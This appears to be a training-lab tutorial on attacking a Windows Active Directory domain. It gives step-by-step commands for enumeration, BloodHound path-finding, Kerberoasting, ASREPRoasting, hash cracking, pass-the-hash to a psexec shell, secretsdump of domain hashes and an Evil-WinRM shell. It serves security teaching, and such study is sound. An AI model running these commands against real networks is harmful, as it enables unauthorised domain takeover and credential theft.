🎯 Lab Objectives
- Understand what Active Directory is and how enterprises use it
- Enumerate users, groups, and computers in an AD domain
- Use BloodHound to visualise attack paths to Domain Admin
- Understand and perform Kerberoasting and ASREPRoasting
Step 1 — Active Directory Overview
Active Directory (AD) is Microsoft's directory service used by virtually every enterprise. It manages authentication, authorisation, and policies for Windows networks. Compromising AD means owning the entire organisation.
# AD key components:
# Domain Controller (DC) → the server that runs AD
# Domain → e.g. corp.local — the AD namespace
# Forest → collection of one or more domains
# Users/Groups → security principals
# GPOs → Group Policy Objects (push config to machines)
# Kerberos → AD's authentication protocol (tickets not passwords)
# LDAP → protocol to query AD (port 389/636)
Step 2 — Key Terminology
| Term | What it means |
|---|---|
| DC | Domain Controller — the heart of AD, handles all auth |
| LDAP | Protocol to query AD (port 389 / 636 SSL) |
| Kerberos | Ticket-based auth protocol AD uses (port 88) |
| SPN | Service Principal Name — ties a service to a user account |
| TGT | Ticket Granting Ticket — proves who you are to Kerberos |
| TGS | Ticket Granting Service — access ticket for a specific service |
| Domain Admin | Group with full control over the entire domain |
| krbtgt | Special account that signs all Kerberos tickets |
Step 3 — Initial Recon
# Find the Domain Controller (look for port 88 Kerberos)
nmap -p 88,389,445,3268 192.168.1.0/24
# Machine with 88 open = Domain Controller
# Get domain info with CrackMapExec (null session)
crackmapexec smb 192.168.1.10
# Output shows:
# SMB 192.168.1.10 445 DC01 [*] Windows Server 2019 (name:DC01) (domain:corp.local)
# Enumerate with valid credentials
crackmapexec smb 192.168.1.10 -u john -p Password123 --users
crackmapexec smb 192.168.1.10 -u john -p Password123 --groups
Step 4 — LDAP Enumeration
# ldapsearch — query AD directly over LDAP
ldapsearch -H ldap://192.168.1.10 -x -b "dc=corp,dc=local"
# Find all users
ldapsearch -H ldap://192.168.1.10 -x -b "dc=corp,dc=local" "(objectClass=user)" sAMAccountName
# ldapdomaindump — dumps everything into HTML reports
sudo apt install python3-ldapdomaindump -y
ldapdomaindump -u 'corp.local\john' -p 'Password123' 192.168.1.10
# Open the generated HTML files:
# domain_users.html → all users with descriptions (often contain passwords!)
# domain_groups.html → group memberships
# domain_computers.html → all machines in the domain
Step 5 — BloodHound
BloodHound visualises Active Directory relationships and automatically finds attack paths from your current user to Domain Admin.
# Install BloodHound
sudo apt install bloodhound -y
# Collect data with SharpHound (run on Windows machine in domain)
# Or use BloodHound-python from Kali:
pip3 install bloodhound
bloodhound-python -u john -p Password123 -d corp.local -ns 192.168.1.10 -c all
# Start Neo4j and BloodHound
sudo neo4j start
bloodhound &
# Default Neo4j creds: neo4j / neo4j (change on first login)
# In BloodHound UI:
# 1. Upload the JSON files collected by bloodhound-python
# 2. Search for your current user
# 3. Right-click → "Shortest path to Domain Admins"
# 4. BloodHound draws the exact attack path with each step
# Key BloodHound queries:
# "Find all Domain Admins"
# "Shortest Paths to Domain Admins"
# "Find Principals with DCSync Rights"
# "Users with most local admin rights"
Step 6 — Kerberoasting
Any domain user can request a Kerberos service ticket for any SPN. The ticket is encrypted with the service account's password hash — you can crack it offline.
# Find accounts with SPNs (Kerberoastable accounts)
crackmapexec ldap 192.168.1.10 -u john -p Password123 --kerberoasting output.txt
# GetUserSPNs (Impacket)
GetUserSPNs.py corp.local/john:Password123 -dc-ip 192.168.1.10 -request
# Output — a hash you can crack offline:
$krb5tgs$23$*svc_http$CORP.LOCAL$http/webserver*$a3f4b2...
# Crack it with Hashcat
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
Step 7 — ASREPRoasting
If a user has "Do not require Kerberos preauthentication" enabled, you can request an AS-REP without knowing their password — and crack the encrypted response offline.
# Find ASREP-roastable users
GetNPUsers.py corp.local/ -dc-ip 192.168.1.10 -no-pass -usersfile users.txt
# Output:
$krb5asrep$23$john@CORP.LOCAL:a1b2c3...
# Crack with Hashcat
hashcat -m 18200 asrep_hash.txt /usr/share/wordlists/rockyou.txt
Step 8 — Pass-the-Hash
# If you have an NTLM hash (from secretsdump, mimikatz, etc.)
# you can authenticate without knowing the plaintext password
# crackmapexec with hash
crackmapexec smb 192.168.1.10 -u administrator -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
# psexec (get a shell)
psexec.py -hashes :8846f7eaee8fb117ad06bdd830b7586c administrator@192.168.1.10
# Dump all hashes from a DC (if you are Domain Admin)
secretsdump.py corp.local/administrator:Password123@192.168.1.10
Step 9 — Common AD Attack Paths
| Attack | Requirement | Result |
|---|---|---|
| Kerberoasting | Any domain user | Service account hash to crack |
| ASREPRoasting | No credentials needed | User hash to crack |
| Pass-the-Hash | NTLM hash | Authenticate as user |
| DCSync | Replication rights | Dump all domain hashes |
| Golden Ticket | krbtgt hash | Forge any ticket forever |
| Silver Ticket | Service account hash | Forge service tickets |
Step 10 — Tools Summary
# Install Impacket (essential AD toolkit)
sudo apt install python3-impacket -y
# Includes: psexec.py, secretsdump.py, GetUserSPNs.py, GetNPUsers.py
# Install Evil-WinRM (Windows Remote Management shell)
sudo gem install evil-winrm
evil-winrm -i 192.168.1.10 -u administrator -p Password123